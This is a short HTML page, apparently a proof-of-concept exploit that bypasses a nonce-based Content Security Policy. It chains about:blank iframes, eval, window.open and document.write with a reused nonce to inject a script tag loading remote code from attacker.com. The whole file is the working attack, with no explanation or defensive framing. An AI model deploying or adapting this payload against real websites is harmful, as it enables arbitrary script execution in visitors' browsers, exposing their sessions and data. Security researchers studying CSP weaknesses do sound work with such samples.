<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGQCxLlGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGQCxLlGGGGG.onload=_=>GGGGGQCxLlGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGQCxLlGGG src=about:blank><\/iframe><script nonce=123>GGGQCxLlGGG.onload=_=>GGGQCxLlGGG.contentWindow.eval(\x22var o=document.createElement(`script`);o.src=`https://attacker.com/static/static.js`;document.body.appendChild(o);void(0);\x22);GGGQCxLlGGG.contentWindow.location.reload();<\/script>');");GGGGGQCxLlGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>